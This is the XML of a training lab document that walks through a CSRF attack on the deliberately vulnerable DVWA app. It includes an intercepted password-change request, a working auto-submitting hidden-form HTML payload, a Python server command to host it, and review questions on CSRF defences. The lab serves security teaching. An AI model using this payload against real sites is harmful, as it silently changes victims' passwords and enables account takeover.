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11</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>PERFORM A CROSS-SITE REQUEST FORGERY (CSRF) ATTACK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construct and execute a Cross-Site Request Forgery (CSRF) attack that tricks an authenticated victim browser into submitting an unauthorized password change request.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CSRF tricks a logged-in user's browser into sending unauthorized requests to a vulnerable application. Because browsers automatically attach session cookies to target-bound requests, the application processes the action as authorized by the victim.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Kali Linux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DVWA (Low Security)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Burp Suite Proxy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Python HTTP Server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Inspect Vulnerable Password Change Request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Submit a password change in DVWA CSRF module and intercept request in Burp Suite to confirm missing CSRF tokens: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GET /dvwa/vulnerabilities/csrf/?password_new=hacked123&amp;password_conf=hacked123&amp;Change=Change HTTP/1.1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Host: &lt;target-ip&gt;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Cookie: PHPSESSID=abc123xyz; security=low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Construct Malicious Auto-Submitting HTML Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Create csrf_attack.html on Kali machine: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&lt;html&gt;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 xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&lt;body onload="document.forms[0].submit()"&gt;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t>&lt;form action="http://&lt;target-ip&gt;/dvwa/vulnerabilities/csrf/" method="GET"&gt;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 xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&lt;input type="hidden" name="password_new" value="hacked123"&gt;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 xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&lt;input type="hidden" name="password_conf" value="hacked123"&gt;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 xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&lt;input type="hidden" name="Change" value="Change"&gt;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t>&lt;/form&gt;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 xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&lt;/body&gt;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&lt;/html&gt;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Host Malicious Web Page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Serve payload via Python HTTP server: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python3 -m http.server 8000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Execute Exploit &amp; Verify Password Change</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Open payload URL (http://&lt;kali-ip&gt;:8000/csrf_attack.html) in victim browser. Verify password was changed to hacked123 without victim interaction.</w:t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6640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Silent execution of forged password change request resulting in successful account password modification without user consent.</w:t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Normal"/>
        <w:rPr>
          <w:color w:val="0F172A"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="0F172A"/>
          <w:sz w:val="25"/>
        </w:rPr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is the difference between CSRF and XSS?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XSS executes malicious script code in the browser. CSRF tricks the browser into sending forged HTTP requests to a site where user is authenticated.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Why does CSRF work even though the attacker never sees the victim's cookies?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Browsers automatically attach domain-bound cookies to outgoing requests regardless of initiating origin site.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How does a CSRF token prevent this attack?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CSRF tokens are unpredictable unique values tied to user session. Attackers cannot guess token values across origins.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Does CSRF work if the victim is not logged in? Why or why not?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No. CSRF requires an active authenticated session cookie attached to the request.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Name two HTTP headers that help mitigate CSRF (SameSite, Origin/Referer).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1) Set-Cookie: SameSite=Strict/Lax</w:t>
              <w:br/>
              <w:t>2) Origin and Referer request headers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3</Pages>
  <Words>376</Words>
  <Characters>2434</Characters>
  <CharactersWithSpaces>2789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2026-10-06T20:06:59Z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